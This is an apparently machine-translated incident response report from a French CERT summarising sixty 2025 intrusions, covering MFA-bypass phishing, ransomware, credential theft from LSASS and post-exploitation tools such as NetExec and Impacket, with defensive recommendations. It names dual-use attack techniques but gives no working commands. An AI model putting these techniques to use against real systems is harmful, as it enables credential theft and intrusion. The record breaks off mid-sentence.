{"id":231421,"date":"2026-02-24T15:09:37","date_gmt":"2026-02-24T15:09:37","guid":{"rendered":"https:\/\/www.intrinsec.com\/?p=231421"},"modified":"2026-03-27T14:43:56","modified_gmt":"2026-03-27T14:43:56","slug":"cert-intrinsec-incidents-report-2025","status":"publish","type":"post","link":"https:\/\/www.intrinsec.com\/en\/cert-intrinsec-incidents-report-2025\/","title":{"rendered":"CERT Intrinsec Incidents Report 2025"},"content":{"rendered":"<p><strong>Intrinsic CERT<\/strong> is a French <a href=\"https:\/\/www.intrinsec.com\/en\/cert-intrinsec\/\">Incident Response team<\/a> providing incident response and crisis management services to organizations across multiple sectors. Certified <strong>TAKEN<\/strong> (<em>Security Incident Response Provider<\/em>) by ANSSI since 2022, the team has been operating since 2013 and has handled hundreds of engagements, gaining firsthand insight into the evolution of threat actor tradecraft.<\/p>\n\n\n\n<p>In 2025, <strong>Intrinsic CERT<\/strong> was engaged in approximately sixty significant incidents involving ransomware operators, Initial Access Brokers (IABs), insider threats, and suspected state-sponsored actors conducting intelligence operations. These incidents spanned a wide range of environments, from legacy on-premise infrastructure to cloud-native Microsoft 365 tenants.<\/p>\n\n\n\n<p>This report synthesizes our observations from these engagements <strong>with a focus on actionable findings<\/strong>. Rather than presenting descriptive statistics alone, we examine intrusion mechanisms, attacker dwell time, targeted assets, and defensive gaps \u2014 <strong>with the explicit goal of informing detection strategies and hardening priorities for security practitioners<\/strong>.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-methodology\">Methodology<\/h2>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-scope-and-inclusion-criteria\">Scope and inclusion criteria<\/h3>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>This report covers incident response engagements conducted by CERT Intrinsec between <strong>January and December 2025<\/strong>. An incident was included in our dataset if it met the following criteria: (1) <strong>a confirmed compromise<\/strong>, as opposed to attempted intrusion or false positive, and (2) <strong>a demonstrated impact<\/strong> on confidentiality, integrity, or availability of data or systems.<\/p>\n\n\n\n<p>Applying these criteria, <strong>sixty incidents were retained for analysis<\/strong>. Incidents classified as false positives, near-misses, or limited to reconnaissance activity without successful intrusion were excluded.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-dataset-characteristics\">Dataset characteristics<\/h3>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The sixty incidents involved <strong>French organizations<\/strong>, including both domestic operations and international subsidiaries. The dataset reflects <strong>a diverse cross-section of industries<\/strong>: banking and insurance, construction, agrifood, public sector, transportation, and media &amp; telecommunications.<\/p>\n\n\n\n<p>Regarding organizational size, approximately <strong>two-thirds of affected entities employed over 1,000 staff<\/strong>, while the remaining third were smaller organisms. Two-thirds of engagements involved clients under preexisting retainer agreements; the remaining third were ad-hoc engagements with organizations contacting CERT Intrinsec for the first time.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-data-collection\">Data collection<\/h3>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>For each incident, the following data points were systematically recorded:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Initial access vector<\/strong><\/li>\n\n\n\n<li><strong>Intrusion date and detection date<\/strong> (enabling dwell time calculation)<\/li>\n\n\n\n<li><strong>Tactics, Techniques, and Procedures<\/strong> (TTPs), mapped to the MITER ATT&amp;CK framework<\/li>\n\n\n\n<li><strong>Compromised accounts <\/strong>(account and privilege level)<\/li>\n\n\n\n<li><strong>Compromised assets<\/strong> (count and type)<\/li>\n\n\n\n<li><strong>Attacker tooling<\/strong> observed<\/li>\n\n\n\n<li><strong>Data exfiltration<\/strong>, where applicable (volume and method)<\/li>\n<\/ul>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-threat-categorization\">Threat categorization<\/h3>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Incidents were categorized by threat actor type and assessed intent:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Ransomware operators<\/strong> \u2014 incidents involving encryption, extortion, or both<\/li>\n\n\n\n<li><strong>Initial Access Brokers<\/strong> (IABs) \u2014 intrusions focused on establishing persistent access for resale, without direct monetization by the initial threat actor<\/li>\n\n\n\n<li><strong>Insider threats<\/strong> \u2014 malicious or negligent actions by employees or contractors<\/li>\n\n\n\n<li><strong>Espionage<\/strong> (suspected) \u2014 intrusions exhibiting TTPs consistent with intelligence gathering, typically attributed to state-sponsored or state-aligned actors<\/li>\n\n\n\n<li><strong>Undetermined intent<\/strong> \u2014 confirmed compromises where the intrusion was contained before the adversary&#039;s objective could be established<\/li>\n<\/ul>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-limitations-and-potential-biases\">Limitations and potential biases<\/h3>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Several limitations should be considered when interpreting our findings.<\/p>\n\n\n\n<p><strong>Selection bias<\/strong>. Our dataset exclusively included incidents that were either detected by the victim organization or reported by a third party. Undetected compromises fall outside our visibility.<\/p>\n\n\n\n<p><strong>Client portfolio bias<\/strong>. The sectoral and organizational size distribution reflects CERT Intrinsec&#039;s client base rather than the broader French economic landscape. Large organizations and sectors with regulatory compliance requirements (eg, banking) may be over-represented.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-incident-distribution-by-threat-type\"><strong>Incident distribution by threat type<\/strong><\/h3>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The sixty incidents were distributed as follows: <strong>Initial Access Broker activity<\/strong> accounted for approximately one-third of cases, as did incidents where threat actor intent remained undetermined due to early containment. <strong>Ransomware incidents<\/strong> represented roughly one-sixth of engagements. A small number of incidents involved <strong>suspected state-sponsored espionage<\/strong> gold <strong>insider threats<\/strong>; given the limited sample size, these categories are discussed qualitatively rather than statistically in subsequent sections.<\/p>\n\n\n\n<p>The relatively high proportion of IAB and undetermined-intent incidents reflects the detection maturity of organizations under retainer agreements, where intrusions were frequently identified before progressing to final-stage objectives such as ransomware deployment or large-scale data exfiltration.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-2025-threat-landscape\">2025 Threat Landscape<\/h2>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>As CERT Intrinsec responds to incidents affecting a diverse range of clients\u2014from large enterprises with mature cybersecurity practices but complex information systems, to smaller organizations with simpler infrastructures yet limited resources to implement effective security controls\u2014our investigations offer a broad perspective on the evolving threat landscape.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large is-resized\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"705\" src=\"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2026\/02\/types_of_attacks-1-1024x705.png\" alt=\"\" class=\"wp-image-231456\" style=\"aspect-ratio:1.4565977416270484;width:573px;height:auto\" srcset=\"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2026\/02\/types_of_attacks-1-1024x705.png 1024w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2026\/02\/types_of_attacks-1-300x206.png 300w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2026\/02\/types_of_attacks-1-768x529.png 768w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2026\/02\/types_of_attacks-1-1536x1057.png 1536w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2026\/02\/types_of_attacks-1-18x12.png 18w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2026\/02\/types_of_attacks-1-650x447.png 650w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2026\/02\/types_of_attacks-1.png 1992w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/div>\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-business-email-compromise-office365-attacks\">Business Email Compromise \u2013 Office365 attacks<\/h3>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The majority of Business Email Compromises (BEC) encountered by CERT Intrinsec in 2025 involved attacks related to the Microsoft Cloud ecosystem (Office365).<br>In these incidents, we saw two trends emerge:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Adversary-in-the-Middle<\/strong> (AitM) attacks defeating multi-factor authentications protections;<\/li>\n\n\n\n<li><strong>Direct Send Abuse<\/strong> to perform targeted phishing attacks<\/li>\n<\/ul>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"h-adversary-in-the-middle-attacks\">Adversary-in-the-Middle attacks<\/h4>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p><strong>Adversary-in-the-Middle<\/strong> (AitM) attacks aim at tricking a user into authenticating on a fake phishing website with the look &amp; feel of Microsoft authentication webpage. Instead of simply stealing the credentials of the targeted user, it performs extra steps by triggering the multi-factor authentication process, on behalf of the victim. The attacker can therefore <strong>retrieve the victim&#039;s credentials<\/strong> and <strong>an authenticated session<\/strong> on the EntraID tenant, <strong>bypassing the MFA<\/strong> protection. Tools such as <a href=\"https:\/\/github.com\/kgretzky\/evilginx2\">EvilGinx2<\/a> weaponizes this attack.<\/p>\n\n\n\n<p>To prevent your users from falling against these attacks, CERT Intrinsec recommends:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Hardening conditional access policies<\/strong> to prevent authentications from unknown sources (geo based or reputation based)<\/li>\n\n\n\n<li>Using <strong>FIDO2 tokens<\/strong><\/li>\n\n\n\n<li><strong><a href=\"https:\/\/www.intrinsec.com\/en\/sensibilisation-culture-cybersecurite\/\">Raising awareness<\/a><\/strong> regarding these kind of attacks for users<\/li>\n\n\n\n<li>Monitoring <strong>risky SignIns<\/strong> and <strong>risky users<\/strong> dashboards, etc.<\/li>\n<\/ul>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"h-directsend-attacks\">DirectSend attacks<\/h4>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p><strong>DirectSend<\/strong> is a Microsoft Exchange Online feature <strong>allowing emails to be sent without authentication within the same tenant<\/strong>. Misconfiguration of mail infrastructure may allow attackers to abuse this feature to send targeted phishing email from any user within a tenant to any other user. This abuse was leveraged in several campaigns to send phishing trying to steal credentials or perform AitM attacks.<\/p>\n\n\n\n<p>In May 2025, Microsoft provided a way to disable this feature. CERT Intrinsec recommends:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Reviewing mail infrastructure and enforcing <strong>strong DMARC policies<\/strong>.<\/li>\n\n\n\n<li><strong>Disabling the Direct Send<\/strong> feature is a great way to prevent this abuse but might break legitimate business process<\/li>\n\n\n\n<li><strong>Implement a mail filtering rule<\/strong> to prevent emails from being sent, through DirectSend, from an internal user (sender) to outside the organization.<\/li>\n<\/ul>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-exploitation-of-public-facing-applications\">Exploitation of public-facing applications<\/h3>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Tea <strong>exploitation of high-severity vulnerabilities against public-facing applications<\/strong> (websites, VPN, SharePoint, etc.) was one of the main causes of security incidents handled by CERT Intrinsec in 2025. Often, these incidents will be linked to large-scale exploitation of a vulnerability around its publication.<\/p>\n\n\n\n<p>In order to prevent or limit this kind of incident, the following actions should be considered:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Maintaining a <strong>complete, up-to-date listing of all public-facing applications<\/strong> we have given information system.<\/li>\n\n\n\n<li>Having a <strong>strong update policy regarding public-facing applications<\/strong> (less than 48 hours for security patches).<\/li>\n\n\n\n<li><strong>CVE monitoring<\/strong> (Common Vulnerabilities and Exposures) <strong>publications<\/strong> related to technologies used in public-facing applications.<\/li>\n\n\n\n<li>Heavily <strong>supervising public-facing applications<\/strong> and their system for any unusual behavior.<\/li>\n<\/ul>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-ransomware-attacks\">Ransomware Attacks<\/h3>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Amongst the approximately ten ransomware incidents investigated in 2025, all followed a <strong>double extortion model<\/strong>: data exfiltration preceded encryption, with the threat of public data exposure used as additional leverage against victims.<br>The ransomware families observed included <strong>Akira, LockBit, Fog, Incransom, and Lynx<\/strong>.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"h-encryption-techniques\">Encryption techniques<\/h4>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Two primary deployment methods were observed:<\/p>\n\n\n\n<p><strong>Remote encryption via network shares. <\/strong>The most common approach involved executing the ransomware binary from a single compromised system \u2014 typically a domain controller or infrastructure server \u2014 and encrypting data on remote systems through administrative shares (ADMIN$, C$). This method avoids deploying the ransomware payload on each individual endpoint, reducing the attacker&#039;s footprint and limiting detection opportunities at the endpoint level.<\/p>\n\n\n\n<p><strong>Deployment via Group Policy Object (GPO). <\/strong>In one engagement, attackers leveraged Active Directory Group Policy to distribute the ransomware payload as a scheduled task across domain-joined systems, ensuring simultaneous execution at scale. Both methods rely on domain-level privileges, reinforcing the critical importance of protecting Active Directory (see Section 4).<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"h-pre-encryption-destruction-sequence\">Pre-encryption destruction sequence<\/h4>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Prior to encryption, attackers systematically targeted backup infrastructure and virtualization platforms to maximize impact and eliminate recovery options:<\/p>\n\n\n\n<p><strong>Hypervisors (VMware ESXi, Hyper-V)<\/strong> \u2013 Destruction or encryption of virtual machines at the hypervisor level;<br><strong>Backup infrastructure (Veeam)<\/strong> \u2013 Access via compromised privileged accounts or exploitation of known Veeam vulnerabilities to delete or encrypt backup repositories.<\/p>\n\n\n\n<p>This destruction phase was observed in every ransomware incident. Attackers consistently prioritized eliminating recovery capabilities before triggering encryption \u2014 a deliberate sequence designed to maximize pressure on the victim organization.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"h-operational-timing\">Operational timing<\/h4>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The interval between data exfiltration completion and ransomware deployment <strong>was consistently short \u2014 typically one to two days<\/strong>. Encryption was almost invariably initiated during nighttime hours, when security monitoring is reduced and response times are longer.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"h-recommendations\">Recommendations<\/h4>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Isolate backup infrastructure from Active Directory<\/strong>. Veeam servers and backup repositories should be deployed outside the Active Directory domain, using dedicated local accounts and separate authentication. A compromised Domain Admin account should not provide access to backup infrastructure.<\/li>\n\n\n\n<li><strong>Implement immutable backups<\/strong>. Configure backup repositories to enforce immutability (write-once, read-many) to prevent deletion or encryption even if the backup server is compromised.<\/li>\n\n\n\n<li><strong>Harden hypervisors independently<\/strong>. ESXi and Hyper-V hosts should not rely on Active Directory authentication. Enforce dedicated local credentials, restrict management interfaces to isolated networks, and apply security patches promptly.<\/li>\n\n\n\n<li><strong>Maintain offline backup copies<\/strong>. At least one backup copy should be physically or logically air-gaped from the production network and domain infrastructure.<\/li>\n\n\n\n<li><strong>Implement out-of-hours monitoring<\/strong>. Given the consistent pattern of nighttime deployment, ensure that security operations provide 24\/7 coverage \u2014 or at minimum, automated alerting capable of triggering emergency response during off-hours.<\/li>\n\n\n\n<li><strong>Test recovery capabilities<\/strong>. Regularly validate that backups can be restored in a realistic disaster recovery scenario. Backup infrastructure that has been silently compromised or corrupted provides no protection.<\/li>\n<\/ul>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-malicious-vpn-access-stolen-accounts\">Malicious VPN access \u2013 Stolen Accounts<\/h3>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>This refers to situations where <strong>the first action of a malicious actor<\/strong> identified during the incident was a <strong>successful authentication using a valid VPN account<\/strong> (without enabled MFA), granting the attacker access to a company&#039;s internal network.<\/p>\n\n\n\n<p>In this situation, it can be difficult to identify the source of the exploited account&#039;s first compromise. In some cases, we could trace back to <strong>the account&#039;s sale by an Initial Access Broker<\/strong> (IAB) on specialized forums thanks to the support of our <strong>CTI squad<\/strong>.<\/p>\n\n\n\n<p>The lack of obvious malicious action at this point of the attack can make it harder to detect the malicious actor quickly, but several actions can be taken in order to prevent or detect this kind of action:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Making Multi-Factor Authentication (MFA) mandatory<\/strong> for any VPN authentication. From our experience, this would have prevented a large number of incidents based on a stolen VPN account.<\/li>\n\n\n\n<li><strong>Identifying the IP&#039;s country of origin and reputation<\/strong>. This can be used to either block or raise an alert when an authentication happens from an unusual country or from an IP linked to a VPN or a malicious actor.<\/li>\n\n\n\n<li><strong>Intensifying the use of Cyber Threat Intelligence<\/strong> (CTI) to identify accounts being sold by malicious actors before they can be exploited.<\/li>\n<\/ul>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-workstation-compromise\">Compromise Workstation<\/h3>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Another prevalent initial access method involved the <strong>compromise of end-user workstations<\/strong> through social engineering. Attackers leveraged tactics such as <strong>fake CAPTCHA<\/strong> challenges (eg, ClickFix), malicious <strong>online advertisements<\/strong> and compromised or spoofed websites.<\/p>\n\n\n\n<p>These techniques were used to deliver payloads, particularly infostealers, capable of harvesting credentials, session cookies, and other sensitive data.<\/p>\n\n\n\n<p>The infostealer ecosystem operates at industrial scale: users can also be infected through <strong>malicious downloads, trojanised software cracks, or compromised legitimate applications<\/strong>. Harvested credentials are aggregated and sold on dedicated marketplaces and Telegram channels, often within hours of collection. The time elapsed between credential theft and exploitation by a threat actor varied considerably, ranging from less than 24 hours to several months. This variability complicates detection: organizations cannot assume that credentials stolen months ago are \u00abstale\u00bb or unexploitable.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Enforce MFA on all remote access<\/strong> \u2014 VPN, Microsoft 365, and any internet-facing authentication portal. This single control addresses the root cause of 80% of observed incidents.<\/li>\n\n\n\n<li><strong><a href=\"https:\/\/www.intrinsec.com\/en\/digital-risk-protection-services-drps\/\">Monitor credential exposure &amp; Subscribe to CTI <\/a><strong>\u2014<\/strong><\/strong> Integrate leaked credentials detection into security operations.<\/li>\n\n\n\n<li><strong>Reduce credential validity<\/strong> \u2014 Implement shorter session lifetimes and conditional access policies to limit the window of exploitation for stolen credentials.<\/li>\n<\/ul>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-malicious-insider\">Malicious Insider<\/h3>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>In addition to external threats, CERT Intrinsec investigated a few incidents involving <strong>malicious insiders<\/strong> in 2025.<\/p>\n\n\n\n<p>These individuals abused their legitimate access to carry out unauthorized actions, such as <strong>stealing corporate workstations<\/strong> gold <strong>deleting critical data from CRM systems<\/strong>.<\/p>\n\n\n\n<p>Such cases emphasize the importance of <strong>access monitoring, privilege segregation, and user activity logging.<\/strong><\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-incident-scale-and-detection-timelines\">Incident Scale and Detection Timelines<\/h2>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>During the incidents investigated, <strong>up to 30 devices were compromised per incident<\/strong>, with <strong>up to 32 user accounts affected<\/strong> depending on detection and containment speed.<\/p>\n\n\n\n<p><strong>The time between initial compromise and CERT activation ranged from 15 hours to 90 days. The median time was 7 days, often including phases of detection, impact assessment, containment, internal investigation, and formal reporting.<\/strong><\/p>\n\n\n\n<p>Notably, some threats remained undetected for extended periods due to <strong>evasion techniques<\/strong> gold <strong>gaps in monitoring across parts of the information system<\/strong>. For example, compromised websites\u2014later used to steal banking credentials or distribute malware\u2014were often discovered several months after the initial breach.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-other-notable-tendencies\">Other notable tendencies<\/h2>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-privilege-escalation-and-credential-access\">Privilege Escalation and Credential Access<\/h3>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p id=\"h-once-initial-access-was-established-threat-actors-systematically-sought-to-escalate-privileges-and-harvest-additional-credentials-in-corporate-network-environments-active-directory-remained-the-primary-target-with-attackers-exploiting-a-combination-of-misconfiguration-weak-credential-hygiene-and-insufficient-segmentation-the-techniques-described-below-were-not-observed-in-a-fixed-sequence-rather-attackers-opportunistically-employed-whichever-methods-yielded-results-in-each-specific-environment\">Once initial access was established, threat actors systematically sought to escalate privileges and harvest additional credentials. In corporate network environments, <strong>Active Directory<\/strong> remained the primary target, with attackers exploiting a combination of <strong>misconfiguration, weak credential hygiene, and insufficient segmentation<\/strong>.<br>The techniques described below were not observed in a fixed sequence; rather, <strong>attackers opportunistically employed whichever methods yielded results<\/strong> in each specific environment.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"h-credential-harvesting-techniques\">Credential harvesting techniques<\/h4>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Extraction of credentials from <strong>LSASS process memory<\/strong> was observed in nearly all incidents involving corporate network compromise. Threat actors employed various techniques to evade detection, including <strong>abuse of native Windows tools<\/strong>: comsvcs.dll invoked via rundll32, Task Manager&#039;s dump functionality, or signed binaries such as ProcDump. Extracted memory dumps were typically exfiltrated to attacker-controlled infrastructure for offline analysis, avoiding the need to run credential extraction tools (eg, Mimikatz) directly on victim systems.<\/p>\n\n\n\n<p>In several incidents, attackers harvested <strong>credentials stored by applications<\/strong>, including web browsers, file transfer clients (WinSCP, FileZilla), and remote management tools (mRemoteNG). These credentials often provided access to additional systems or third-party services. In isolated cases, sophisticated actors <strong>deployed hooks on authentication pages of internal applications<\/strong> (eg, GLPI) to intercept administrator credentials in real time.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"h-commonly-exploited-active-directory-weaknesses\">Commonly exploited Active Directory weaknesses<\/h4>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Several <strong>Active Directory misconfiguration<\/strong> recurred across engagements:<\/p>\n\n\n\n<p>Excessive privileges, Delegation issues, Hard-coded service credentials, Local administrator password reuse, Weak or reused passwords, etc.<br>These weaknesses are well-documented and frequently highlighted in penetration test reports. Their persistence in production environments <strong>reflects a gap between security assessment findings and remediation implementation<\/strong>.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"h-high-value-targets\">High-value targets<\/h4>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Attackers prioritized specific system categories for credential harvesting:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Administrator workstations<\/strong> \u2014 frequently containing cached credentials, browser sessions, and access to privileged tools; ;<\/li>\n\n\n\n<li><strong>Infrastructure servers<\/strong> \u2014 domain controllers, hypervisors, backup servers, and management consoles; ;<\/li>\n\n\n\n<li><strong>Jump hosts and bastion servers<\/strong> \u2014 by design, these systems aggregate privileged sessions and credentials.<\/li>\n\n\n\n<li>Compromise of any single high-value target often provided sufficient credentials for lateral movement to the remainder of the environment.<\/li>\n<\/ul>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"h-defensive-implications\">Defensive implications<\/h4>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The prevalence of credential harvesting and Active Directory exploitation supports the following defensive priorities:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Implement Privileged Access Workstations (PAW)<\/strong>. Isolate administrative activities on hardened, dedicated systems to prevent credential exposure on standard endpoints.<\/li>\n\n\n\n<li><strong>Deploy LAPS (Local Administrator Password Solution)<\/strong>. Eliminate local administrator password reuse by enforcing unique, automatically rotated passwords per system.<\/li>\n\n\n\n<li><strong>Enforce Active Directory tiering<\/strong>. Prevent credential exposure across trust boundaries by segregating Tier 0 (domain controllers), Tier 1 (servers), and Tier 2 (workstations) administration.<\/li>\n\n\n\n<li><strong>Audit and reduce privileged accounts<\/strong>. Regularly review accounts with Domain Admin, Enterprise Admin, or equivalent privileges; remove unnecessary memberships.<\/li>\n\n\n\n<li><strong>Eliminate hard-coded credentials<\/strong>. Audit scripts, scheduled tasks, and service configurations for embedded passwords; migrate to managed service accounts (gMSA) or secrets management solutions.<\/li>\n\n\n\n<li><strong>Protect LSASS<\/strong>. Enable Credential Guard where supported; configure LSA protection (RunAsPPL); monitor for suspicious access to the LSASS process.<\/li>\n\n\n\n<li><strong>Detect recognition tooling<\/strong>. Implement detection rules for SharpHound\/BloodHound LDAP query patterns, anomalous SPN requests (Kerberoasting indicators), and large-scale Active Directory enumeration.<\/li>\n\n\n\n<li><strong>Strengthen service account passwords<\/strong>. Enforce long, complex passwords (25+ characters) for accounts with SPNs to make Kerberoasting impractical.<\/li>\n<\/ul>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-execution-and-tooling\">Execution and Tooling<\/h3>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Attackers required command execution capabilities throughout the intrusion lifecycle \u2014 from internal reconnaissance to privilege escalation, lateral movement, and impact. In all observed incidents, threat actors relied on <strong>native Windows interpreters <\/strong>(PowerShell, cmd.exe) for basic operations, supplemented by <strong>specialized tooling for more complex tasks<\/strong>.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"h-post-exploitation-frameworks-and-tooling\">Post-exploitation frameworks and tooling<\/h4>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Several post-exploitation tools were commonly observed across engagements: <strong>NetExec<\/strong> (formerly CrackMapExec) was frequently used for credential validation, lateral movement, and remote command execution. This framework offers multiple execution modules, each leaving distinct forensic artifacts:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>smbexec<\/strong>, Remote service creation, Service Creation events (7045)<\/li>\n\n\n\n<li><strong>atexec<\/strong>, Remote scheduled task, Scheduled Task events (4698)<\/li>\n<\/ul>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p><strong>Impacket<\/strong> scripts (wmiexec.py, smbexec.py, psexec.py) were also observed. A distinctive forensic indicator of Impacket-based execution is <strong>the creation of services with names containing Unix epoch timestamps<\/strong> \u2014 a pattern rarely seen in legitimate Windows administration and highly indicative of compromise.<\/p>\n\n\n\n<p><strong>PsExec<\/strong> and direct access to administrative shares (ADMIN$, C$, etc.) remained present in some engagements, though less prevalent than in previous years. Attackers increasingly favor tooling that avoids dropping executable files on disk.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"h-the-detection-gap\">The detection gap<\/h4>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>In the majority of incidents, victim organizations <strong>failed to detect the attacker&#039;s tooling during the intrusion<\/strong>. These tools were identified only during post-incident forensic analysis. This detection failure was not due to the stealthiness of attacker techniques \u2014 the tools described above leave abundant, well-documented forensic artifacts. Rather, detection failed because <strong>the necessary logs were either not collected or not 